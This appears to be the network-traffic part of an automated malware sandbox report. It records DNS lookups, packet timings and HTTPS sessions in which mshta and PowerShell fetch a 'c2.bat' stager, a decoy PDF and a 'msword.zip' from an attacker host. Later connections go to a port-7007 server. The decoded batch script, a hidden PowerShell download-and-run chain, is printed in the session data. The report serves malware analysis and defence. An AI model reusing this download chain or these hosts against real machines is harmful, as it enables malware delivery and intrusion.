Dec 10, 2024 09:48:13.568739891 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:13.568769932 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:13.568864107 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:13.568871975 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:13.569036007 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:13.775336027 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:13.775413990 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:14.112375975 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:14.112396002 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:14.112457991 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:14.118895054 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:14.118901014 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:14.118921995 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:14.118937016 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:14.118956089 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:14.119000912 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:14.119008064 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:14.119023085 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:14.119031906 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:14.119112968 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:14.119122028 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:14.119139910 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:14.119154930 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:14.119165897 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:14.119170904 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:14.119200945 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:14.119206905 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:14.119271040 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:14.119340897 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:14.119348049 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:14.119420052 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:14.331345081 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:14.331543922 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:14.401401043 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:14.401432991 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:14.401447058 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:14.401482105 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:14.401520014 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:14.408721924 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:14.408735037 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:14.408751011 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:14.408763885 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:14.408817053 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:14.408823967 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:14.408849001 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:14.408870935 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:14.408876896 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:14.408901930 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:14.408905983 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:14.408952951 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:14.408962011 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:14.408994913 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:14.409014940 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:14.409070969 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:14.651221037 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:14.659794092 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:14.949167013 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:50:59.946336031 CET	49996	7007	192.168.2.5	87.120.117.152
Dec 10, 2024 09:51:00.065818071 CET	7007	49996	87.120.117.152	192.168.2.5
Dec 10, 2024 09:51:00.065906048 CET	49996	7007	192.168.2.5	87.120.117.152
Dec 10, 2024 09:51:00.168272972 CET	49996	7007	192.168.2.5	87.120.117.152
Dec 10, 2024 09:51:00.287777901 CET	7007	49996	87.120.117.152	192.168.2.5
Dec 10, 2024 09:51:12.000071049 CET	49996	7007	192.168.2.5	87.120.117.152
Dec 10, 2024 09:51:12.119595051 CET	7007	49996	87.120.117.152	192.168.2.5
Dec 10, 2024 09:51:15.726460934 CET	7007	49996	87.120.117.152	192.168.2.5
Dec 10, 2024 09:51:15.777792931 CET	49996	7007	192.168.2.5	87.120.117.152
Dec 10, 2024 09:51:23.825859070 CET	49996	7007	192.168.2.5	87.120.117.152
Dec 10, 2024 09:51:23.945550919 CET	7007	49996	87.120.117.152	192.168.2.5
Dec 10, 2024 09:51:35.653165102 CET	49996	7007	192.168.2.5	87.120.117.152
Dec 10, 2024 09:51:35.772648096 CET	7007	49996	87.120.117.152	192.168.2.5
Dec 10, 2024 09:51:45.726380110 CET	7007	49996	87.120.117.152	192.168.2.5
Dec 10, 2024 09:51:45.777801991 CET	49996	7007	192.168.2.5	87.120.117.152
Dec 10, 2024 09:51:47.481523991 CET	49996	7007	192.168.2.5	87.120.117.152
Dec 10, 2024 09:51:47.600802898 CET	7007	49996	87.120.117.152	192.168.2.5
Dec 10, 2024 09:51:59.309324980 CET	49996	7007	192.168.2.5	87.120.117.152
Dec 10, 2024 09:51:59.428972006 CET	7007	49996	87.120.117.152	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 10, 2024 09:47:57.592351913 CET	53993	53	192.168.2.5	1.1.1.1
Dec 10, 2024 09:47:57.915793896 CET	53	53993	1.1.1.1	192.168.2.5
Dec 10, 2024 09:48:13.640070915 CET	64117	53	192.168.2.5	1.1.1.1
Dec 10, 2024 09:48:52.047171116 CET	65268	53	192.168.2.5	1.1.1.1
Dec 10, 2024 09:48:52.269406080 CET	53	65268	1.1.1.1	192.168.2.5
Dec 10, 2024 09:50:59.637021065 CET	49782	53	192.168.2.5	1.1.1.1
Dec 10, 2024 09:50:59.942517042 CET	53	49782	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 10, 2024 09:47:57.592351913 CET	192.168.2.5	1.1.1.1	0x4197	Standard query (0)	myguyapp.com	A (IP address)	IN (0x0001)	false
Dec 10, 2024 09:48:13.640070915 CET	192.168.2.5	1.1.1.1	0x4d28	Standard query (0)	x1.i.lencr.org	A (IP address)	IN (0x0001)	false
Dec 10, 2024 09:48:52.047171116 CET	192.168.2.5	1.1.1.1	0x7989	Standard query (0)	dwLscOsEZmpbOxr.dwLscOsEZmpbOxr	A (IP address)	IN (0x0001)	false
Dec 10, 2024 09:50:59.637021065 CET	192.168.2.5	1.1.1.1	0xb544	Standard query (0)	me-work.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 10, 2024 09:47:57.915793896 CET	1.1.1.1	192.168.2.5	0x4197	No error (0)	myguyapp.com		193.26.115.21	A (IP address)	IN (0x0001)	false
Dec 10, 2024 09:48:13.777338028 CET	1.1.1.1	192.168.2.5	0x4d28	No error (0)	x1.i.lencr.org	crl.root-x1.letsencrypt.org.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 10, 2024 09:48:15.594204903 CET	1.1.1.1	192.168.2.5	0xaf41	No error (0)	bg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false
Dec 10, 2024 09:48:15.594204903 CET	1.1.1.1	192.168.2.5	0xaf41	No error (0)	bg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false
Dec 10, 2024 09:48:52.269406080 CET	1.1.1.1	192.168.2.5	0x7989	Name error (3)	dwLscOsEZmpbOxr.dwLscOsEZmpbOxr	none	none	A (IP address)	IN (0x0001)	false
Dec 10, 2024 09:50:59.942517042 CET	1.1.1.1	192.168.2.5	0xb544	No error (0)	me-work.com		87.120.117.152	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

myguyapp.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49706	193.26.115.21	443	3992	C:\Windows\SysWOW64\mshta.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-10 08:47:59 UTC	302	OUT	GET /c2.bat HTTP/1.1 Accept: / Accept-Language: en-ch Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: myguyapp.com Connection: Keep-Alive
2024-12-10 08:47:59 UTC	287	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 08:47:59 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Last-Modified: Mon, 25 Nov 2024 20:56:08 GMT ETag: "1cd-627c2f6348132" Accept-Ranges: bytes Content-Length: 461 Connection: close Content-Type: application/x-msdownload
2024-12-10 08:47:59 UTC	461	IN	Data Raw: 40 65 63 68 6f 20 6f 66 66 0d 0a 73 65 74 20 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 6d 79 67 75 79 61 70 70 2e 63 6f 6d 2f 6d 73 77 6f 72 64 2e 7a 69 70 0d 0a 73 65 74 20 75 72 6c 32 3d 68 74 74 70 73 3a 2f 2f 6d 79 67 75 79 61 70 70 2e 63 6f 6d 2f 66 2e 70 64 66 0d 0a 70 6f 77 65 72 73 68 65 6c 6c 20 2d 57 69 6e 64 6f 77 53 74 79 6c 65 20 48 69 64 64 65 6e 20 2d 43 6f 6d 6d 61 6e 64 20 22 49 6e 76 6f 6b 65 2d 57 65 62 52 65 71 75 65 73 74 20 2d 55 72 69 20 25 75 72 6c 32 25 20 2d 4f 75 74 46 69 6c 65 20 25 74 65 6d 70 25 5c 66 2e 70 64 66 22 0d 0a 63 64 20 25 74 65 6d 70 25 0d 0a 73 74 61 72 74 20 66 2e 70 64 66 0d 0a 70 6f 77 65 72 73 68 65 6c 6c 20 2d 57 69 6e 64 6f 77 53 74 79 6c 65 20 48 69 64 64 65 6e 20 2d 43 6f 6d 6d 61 6e 64 20 22 49 6e 76 6f 6b 65 Data Ascii: @echo offset url=https://myguyapp.com/msword.zipset url2=https://myguyapp.com/f.pdfpowershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri %url2% -OutFile %temp%\f.pdf"cd %temp%start f.pdfpowershell -WindowStyle Hidden -Command "Invoke

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49708	193.26.115.21	443	6756	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-10 08:48:02 UTC	162	OUT	GET /f.pdf HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: myguyapp.com Connection: Keep-Alive
2024-12-10 08:48:02 UTC	283	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 08:48:02 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Last-Modified: Mon, 28 Oct 2024 21:28:02 GMT ETag: "4374e-6259024c862cf" Accept-Ranges: bytes Content-Length: 276302 Connection: close Content-Type: application/pdf
2024-12-10 08:48:02 UTC	7909	IN	Data Raw: 25 50 44 46 2d 31 2e 34 0d 0a 25 c2 80 c2 81 c2 82 c2 83 0d 0a 31 20 30 20 6f 62 6a 0d 0a 3c 3c 20 0d 0a 20 20 20 2f 42 69 74 73 50 65 72 43 6f 6d 70 6f 6e 65 6e 74 20 31 20 0d 0a 20 20 20 2f 43 6f 6c 6f 72 53 70 61 63 65 20 33 20 30 20 52 20 0d 0a 20 20 20 2f 48 65 69 67 68 74 20 33 32 38 38 20 0d 0a 20 20 20 2f 53 75 62 74 79 70 65 20 2f 49 6d 61 67 65 20 0d 0a 20 20 20 2f 54 79 70 65 20 2f 58 4f 62 6a 65 63 74 20 0d 0a 20 20 20 2f 57 69 64 74 68 20 32 35 36 30 20 0d 0a 20 20 20 2f 46 69 6c 74 65 72 20 5b 0d 0a 20 20 20 20 2f 43 43 49 54 54 46 61 78 44 65 63 6f 64 65 20 20 5d 0d 0a 20 20 20 0d 0a 20 20 20 2f 44 65 63 6f 64 65 50 61 72 6d 73 20 5b 0d 0a 20 20 20 20 3c 3c 20 0d 0a 20 20 20 20 20 20 2f 42 6c 61 63 6b 49 73 31 20 74 72 75 65 20 0d 0a 20 20 Data Ascii: %PDF-1.4%1 0 obj<< /BitsPerComponent 1 /ColorSpace 3 0 R /Height 3288 /Subtype /Image /Type /XObject /Width 2560 /Filter [ /CCITTFaxDecode ] /DecodeParms [ << /BlackIs1 true
2024-12-10 08:48:03 UTC	16384	IN	Data Raw: fe f7 fc 8c 7f ff ff 55 fd ef fe df fa 8d 69 3f 7e 71 11 d6 be 97 fd 97 0b fb f1 12 2b 58 a7 56 ab ff 17 fd fe af 65 c1 ff ef ff fa 76 37 ff fd bf d6 d2 5f bf ff ff 7f ff f6 fa f7 bf f9 11 c2 fe f9 15 ac b1 4a ff ea 10 fe ff fc 8b cf fb db f8 fe 43 8e 50 ef 0e fb 7d e9 6f e8 47 4e be 43 13 af ff ff ff ef df d3 f7 7f ad d7 ff df 56 d2 fb 4b 7f bb bd ef bb 6d 7e 41 43 58 a6 b5 aa b0 d6 43 47 10 50 a0 30 bf 7c 8b ab bd f8 30 4a ee 2b 7f 5e b5 e3 f6 bf fb ff 6b da df e9 ee fd af 0d 7f af bf 86 bd 84 e1 a6 bd eb 7c 30 9a 06 55 94 39 14 70 88 98 41 11 da 68 44 44 18 21 11 11 1c 44 7f ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff c8 09 f0 b8 20 79 01 85 01 0a 9b 25 04 10 79 01 05 d1 7c 8e c8 ec d4 32 5c 50 44 18 04 78 4f 29 95 26 4b 45 3b d1 95 01 b0 a7 20 Data Ascii: Ui?~q+XVev7_JCP}oGNCVKm~ACXCGP0\|0J+^k\|0U9pAhDD!D y%y\|2\PDxO)&KE;
2024-12-10 08:48:03 UTC	16384	IN	Data Raw: ff fc 89 22 97 91 f2 0c c8 90 f3 58 c8 36 48 14 8c 1e 4c 05 04 18 41 90 e0 40 cc c3 00 83 33 0c 02 0c d1 a6 10 71 68 3f d3 4d 6d 3f 91 2d a2 3c 7f 5e 46 f2 0b 12 e4 55 99 39 11 83 22 c2 eb 9b 18 22 28 b1 2a 14 38 86 6a 0a 62 34 82 06 7c 30 08 32 1c 13 04 c1 0c 20 c1 10 20 e1 a1 0e d3 4d 3f 09 da 7f 85 44 47 68 8e 1c 84 bc 97 bf a6 e9 fc b7 30 21 06 29 4e 2d 82 98 59 81 41 11 06 cf 00 c1 03 21 a2 3a 04 18 20 60 98 41 94 06 08 c0 c4 43 04 19 30 08 84 34 2d 34 ed 03 43 40 d5 06 a8 3f 4f 4f d1 08 3e 42 43 44 5b 6d 35 c8 b8 e0 9d 27 84 ea 1f e9 d2 6d f0 40 ca 18 20 c2 74 10 87 84 0c 20 d0 86 10 68 44 35 40 c2 0d 3b 86 83 d3 5c 27 ae ab aa de 88 b8 da 91 df e0 83 70 9d 04 e5 06 43 3d 04 e9 3d 3d 37 5f d3 7f 5a 68 5a 17 c5 a0 ed 38 b0 9a 7f ae 9f c8 dd d2 22 db Data Ascii: "X6HLA@3qh?Mm?-<^FU9""(*8jb4\|02 M?DGh0!)N-YA!: `AC04-4C@?OO>BCD[m5'm@ t hD5@;\'pC===7_ZhZ8"
2024-12-10 08:48:03 UTC	16384	IN	Data Raw: 23 85 e2 a2 98 e2 9a ff 76 bf ab e9 a6 98 54 d0 88 86 08 89 b2 3e 22 19 46 e6 96 be 2b 90 9d d8 e3 63 f7 a7 6b fd a0 c2 6a 9a 0d 34 19 0b 61 08 83 04 0c 12 86 10 88 8e d7 bf 7e d5 3f 4c 26 98 4d 53 54 d3 08 30 9a 11 06 08 30 84 44 68 71 f6 b7 fa a6 43 be a4 c7 08 34 c2 0c 20 64 7b 17 04 22 23 fe 18 55 b4 d3 04 47 52 e0 20 61 08 e1 84 19 19 72 cd c2 a3 88 64 55 94 22 75 31 c4 71 11 6b 11 1f 6b f1 d7 ff ff f7 61 62 3f ff ff ff ff ff ff ff ff ef fa ff ff ff ff fe ff af fe ff ff ff ff ff ff ff ff ff ff ff ff ff 94 c2 9b cb 6d 69 fd ae 5a a6 a1 0e c5 33 b4 0b d9 5d 5d 96 69 f2 3b 32 10 64 71 9a 65 c1 0e 80 dc 20 66 a0 6e 83 5f 0b 96 61 34 50 66 98 21 22 d6 4a b2 c1 90 cd c2 75 93 a0 86 10 83 b4 1f af 5e 59 4c 22 e8 be 47 22 f9 9b 23 99 1d 17 23 38 a0 18 3a 0a Data Ascii: #vT>"F+ckj4a~?L&MST00DhqC4 d{"#UGR ardU"u1qkkab?miZ3]]i;2dqe fn_a4Pf!"Ju^YL"G"##8:
2024-12-10 08:48:03 UTC	16384	IN	Data Raw: f2 46 68 83 fb ff b9 4e ff da ff 0d 87 77 ff 44 63 be bd b4 0c 20 79 a3 77 b5 db 5b 4e ff bf f7 39 3f ff d7 7f ff a7 f1 f1 5e eb b7 ff 9c 2d 07 fa 5f a4 de bf 6b 7f ab 5b b6 17 af ff fe fe fa 5c 8f 9b 46 12 57 6b ee 96 ba ff 56 b6 bd 75 fd ff b6 bb c4 44 97 5b b4 be 18 56 2b fd 76 1a 4d af ff f8 5b 5e c2 5f ef 15 ec 57 fd 6f 1d a5 a6 b7 fb 0c 24 c5 6c 76 ba 4c 3f da 6b f7 e9 a6 3b df fe 3f 6b f4 ba f6 9a 77 f6 dd aa ff fd a6 b6 15 35 4d 06 a4 dc 21 10 61 03 04 3f 5b 4d 06 16 ff 5b 4d 06 84 30 85 a1 11 c4 47 76 ab 0c 10 61 06 10 88 88 88 32 2a 72 39 01 d4 44 68 96 8a 0c e3 82 11 1f c4 47 d7 d2 df f5 d6 98 5e 3d 63 bf ff ff ff ff f9 67 7f ac 7f ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd d5 cb 30 28 ce 88 ba 21 b3 a6 50 b2 ce 2f 90 f2 Data Ascii: FhNwDc yw[N9?^-_k[\FWkVuD[V+vM[^_Wo$lvL?k;?kw5M!a?[M[M0Gva2*r9DhG^=cg0(!P/
2024-12-10 08:48:03 UTC	16384	IN	Data Raw: ea 08 c0 a1 7c 8e 9c 56 d5 44 e8 9b d4 33 ba 08 c3 da 87 84 08 7e 11 c4 53 e1 9e 29 91 d6 bc 1e 1a 4f 48 c2 13 a2 86 b2 e3 40 89 58 77 16 92 97 c4 bf 0d 3f c1 1c 7e 47 5d 5e 14 c6 22 61 58 71 42 a8 22 28 e0 fa 4e c2 9b 49 0d b8 c7 61 38 7a a8 6b 30 a1 37 88 20 46 05 8f ae 28 12 d4 47 14 c4 17 08 3d 68 25 a4 21 bc 36 60 6f f7 a0 81 05 98 48 10 b6 5d 62 08 f6 3d 30 aa 12 08 2d 04 1f a0 8a 70 8b ea d1 1d 78 45 0e bf 31 d0 73 3f 08 a1 d7 91 d6 81 11 fd f3 08 63 61 1c 5d 68 21 f1 f7 68 c6 33 c4 4c 75 49 42 07 c4 3b f9 84 2d 50 98 ea 92 84 38 bb fc 28 3a 7f 8d 16 39 87 ce ea d8 df 15 61 a7 6b 58 41 ed 62 85 21 88 4a ac c0 47 57 18 28 df 16 a1 55 c1 11 ee a6 7a 5b 48 a1 dd c4 d3 1b 40 8a f0 e3 d2 08 2e 9d dd d3 48 60 88 f8 6c 11 44 45 3f ee 18 60 c6 a5 44 5a ef Data Ascii: \|VD3~S)OH@Xw?~G]^"aXqB"(NIa8zk07 F(G=h%!6`oH]b=0-pxE1s?ca]h!h3LuIB;-P8(:9akXAb!JGW(Uz[H@.H`lDE?`DZ
2024-12-10 08:48:03 UTC	16384	IN	Data Raw: ad 18 4b 1a 97 ef 54 81 15 08 45 dc fc a5 f3 f9 7c bd 58 8b b9 9f 64 78 f6 5f 30 ab 11 dc cd 18 cc 22 46 5d 35 42 3b 44 34 6a 4d 0a ed 6c 22 46 51 97 eb 73 aa c5 a7 1f ac 68 a3 3a e1 c4 53 b5 b8 84 1d c9 f2 13 d0 4c 64 f9 74 6b 56 35 88 88 88 b1 89 f4 5f 35 f5 88 88 88 be 26 32 0d 0a e3 42 2d 0e e2 44 d1 8e 61 d3 5c d0 58 e6 1f 2d c2 30 84 41 15 07 7c c3 98 70 53 0f 8a 16 b5 43 40 88 e1 4e 71 5f 10 96 61 e9 31 ab 14 a2 3d a0 44 7f 49 53 bb 51 b5 11 0a 35 fd c3 65 4e 47 6c a1 ca 71 8a 69 59 1f 36 81 12 1f 1d 29 74 81 17 59 81 92 22 3f 70 40 8e 3d d8 e3 23 e2 66 8c 69 90 f3 ea ae f2 3d f9 1d 20 45 d2 66 11 7d 06 92 c2 23 e0 8e 39 87 c4 44 64 7e ec 4c 44 3c 4b ac 11 c7 a1 64 7d 6f cf e2 63 3a 21 2f dd c6 47 93 b4 d4 fe 26 10 97 5d e9 9e d5 35 11 2e b3 3d 32 Data Ascii: KTE\|Xdx_0"F]5B;D4jMl"FQsh:SLdtkV5_5&2B-Da\X-0A\|pSC@Nq_a1=DISQ5eNGlqiY6)tY"?p@=#fi= Ef}#9Dd~LD<Kd}oc:!/G&]5.=2
2024-12-10 08:48:03 UTC	16384	IN	Data Raw: 49 82 fd d7 b0 6b 54 ec 35 0e f3 0f 4c bb 60 a1 08 87 ff c3 83 c3 41 b5 62 e2 14 44 f6 f6 20 8a bb 84 71 e5 91 50 33 76 bf 07 f5 f8 3d ce e0 31 8b 62 13 15 34 44 76 a9 82 67 11 84 10 4e da f8 41 60 cc 38 ba c2 67 30 47 1f 61 cb ea b0 44 7d 8a 72 c8 14 1a 4d 8f e1 f6 fd 58 3b a2 64 19 99 27 36 74 e8 24 20 f9 1e 85 40 b8 2d ff 88 82 04 0a 1c 48 fb 74 47 e2 c8 f1 cc df 97 63 15 a0 84 5c b2 16 06 b7 f8 7f 4b e1 f8 22 1a 6c 81 24 3b 6c da 4c 30 92 2e b1 b1 75 08 21 9d d9 84 be 96 6f 43 34 93 23 cd 04 56 43 8d a0 ed b4 58 f1 09 98 ac b2 0b 02 a6 4a 1f ef b7 f4 c1 db 40 88 6d 32 0c e2 c3 15 14 82 0c be 2e 35 e1 b1 06 df 7c 42 2d d4 32 3f 41 02 23 a0 98 b9 cd 30 e1 bb 23 a6 9b 34 56 1b 23 c1 02 cb 20 90 32 bf fb 7e 97 b0 7e 08 3c ba 12 f5 c1 25 4a 7d 67 f0 81 0b Data Ascii: IkT5L`AbD qP3v=1b4DvgNA`8g0GaD}rMX;d'6t$ @-HtGc\K"l$;lL0.u!oC4#VCXJ@m2.5\|B-2?A#0#4V# 2~~<%J}g
2024-12-10 08:48:03 UTC	16384	IN	Data Raw: b1 65 3b 4c 22 a8 7e 82 4d 84 b6 55 b1 15 41 11 f5 ad 2b 45 db 62 3f fe 35 44 1b 47 f2 c7 ff ff d7 ef 75 69 76 c4 42 36 bb 47 d4 e2 8f 6d b5 a4 20 c5 bc 48 e8 20 56 91 71 22 c2 1a 08 8f 98 df b8 52 6c c2 4d 7e 6a 83 1f bb fe dd 57 5f af fe b6 61 18 52 87 17 fa 4c a1 ca 78 30 84 45 bc fa 35 60 98 ff c9 0e 11 1d 36 6e 50 87 09 94 e0 8c 20 60 88 fa 2a 02 23 8a 08 13 68 11 1d 38 61 c2 23 ab 5f 6f 91 5c ce a2 e8 1a d9 27 20 90 4d d5 89 83 85 fa aa fa b0 d0 9c 71 10 69 af 4b 8b 89 f4 46 40 8a 78 dc 34 11 a6 db bd 53 e3 4c 5e 21 82 c2 87 16 08 12 4c 57 04 0b 68 11 43 82 0b b1 55 fb 63 b1 15 50 85 8d 3f 5a 5d 69 7e 1c 54 83 71 fd 28 5c 44 f3 48 be b6 47 44 74 48 d5 a6 50 7e f5 47 74 22 50 85 13 1e a5 d0 de 9a 29 d3 08 8f bf 0c 63 1e bf 4b 7f 08 84 82 f8 83 8f b4 Data Ascii: e;L"~MUA+Eb?5DGuivB6Gm H Vq"RlM~jW_aRLx0E5`6nP `*#h8a#_o\' MqiKF@x4SL^!LWhCUcP?Z]i~Tq(\DHGDtHP~Gt"P)cK
2024-12-10 08:48:03 UTC	16384	IN	Data Raw: a2 3c e6 31 d4 47 1f b8 43 88 9c 88 e8 61 28 4e b1 04 12 77 f0 43 42 d1 1f 2f 18 c9 09 36 ed b1 23 a4 11 84 69 0f 06 60 52 3c 5f b3 e8 20 42 67 62 4e a9 6a a0 d0 60 ef f9 f4 26 d2 16 ea 7b 1d de 82 c2 55 36 2f a5 17 46 d0 d9 c4 9b ae c2 53 0f 0c 11 d3 bf a5 31 89 3f 6e 3b b6 2d 0c 8b 77 61 17 04 23 ae 82 2d d0 30 40 99 1d 62 a8 a1 e2 90 eb 8a 97 49 36 de af f0 fc 5f 3f 07 51 39 8a 25 62 f8 a1 41 06 2e c4 44 c4 0a 48 7b 09 23 12 d8 dd ee e8 23 49 8b 10 65 20 af 28 76 25 fc 8f 03 1f 08 32 a0 32 3a 96 e9 5b a3 e8 9e a0 8e 82 de 5e 11 5b a6 ce 27 f5 4c 4c 2b 73 71 8b 3c fd a3 da d9 1d be 82 65 00 90 f1 10 46 81 82 05 f6 a1 04 08 32 3a 05 4e 92 16 c4 ba 38 ae fc 52 23 ab 34 b4 82 46 12 2b 2a 37 6d 37 2a 22 14 61 38 6d 21 c3 d4 21 17 2e d8 49 1c d0 42 14 3b ee Data Ascii: <1GCa(NwCB/6#i`R<_ BgbNj`&{U6/FS1?n;-wa#-0@bI6_?Q9%bA.DH{##Ie (v%22:[^['LL+sq<eF2:N8R#4F+7m7"a8m!!.IB;

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49711	193.26.115.21	443	6192	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-10 08:48:06 UTC	167	OUT	GET /msword.zip HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: myguyapp.com Connection: Keep-Alive
2024-12-10 08:48:06 UTC	285	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 08:48:06 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Last-Modified: Tue, 29 Oct 2024 16:49:11 GMT ETag: "3a0583-625a05d5cdaa6" Accept-Ranges: bytes Content-Length: 3802499 Connection: close Content-Type: application/zip
2024-12-10 08:48:06 UTC	7907	IN	Data Raw: 50 4b 03 04 14 00 00 00 08 00 05 ab 5c 59 89 46 99 25 0d 05 3a 00 f7 ff 1f 35 0a 00 00 00 6d 73 77 6f 72 64 2e 65 78 65 ec bd 7f 7c 54 c5 b9 3f 7e f6 47 c2 92 6c d8 45 12 0c 1a 34 42 50 94 1f 8d 2e 28 71 41 17 c8 09 d1 b2 b8 b8 66 17 94 00 2a c4 c3 8a 40 c9 39 fc 68 89 26 9c a4 b2 1e d6 5a 6b 6f b5 b5 b7 a6 d8 5b db da 4a 5b 2b 51 11 13 40 12 94 5a 14 2e a6 05 af 11 a9 ce ba 51 57 89 61 81 c8 f9 bc 9f 99 dd 10 b8 b6 bd 9f cf eb 7e ff fb 06 67 cf 9c 39 cf cc 3c f3 cc f3 73 66 ce d1 7f fb 23 92 4d 92 24 3b 92 69 4a 52 8b 24 fe 7c d2 bf fe db 8f 34 e4 d2 97 86 48 cf 0f fe f3 65 2d 96 d9 7f be ec 36 65 59 6d f1 aa d5 2b ef 59 7d e7 7d c5 77 df b9 62 c5 4a b5 f8 ae a5 c5 ab b5 15 c5 cb 56 14 97 df 12 2c be 6f e5 92 a5 13 f3 f2 72 4a d2 6d 4c ff ce 5b f7 66 5d Data Ascii: PK\YF%:5msword.exe\|T?~GlE4BP.(qAf*@9h&Zko[J[+Q@Z.QWa~g9<sf#M$;iJR$\|4He-6eYm+Y}}wbJV,orJmL[f]
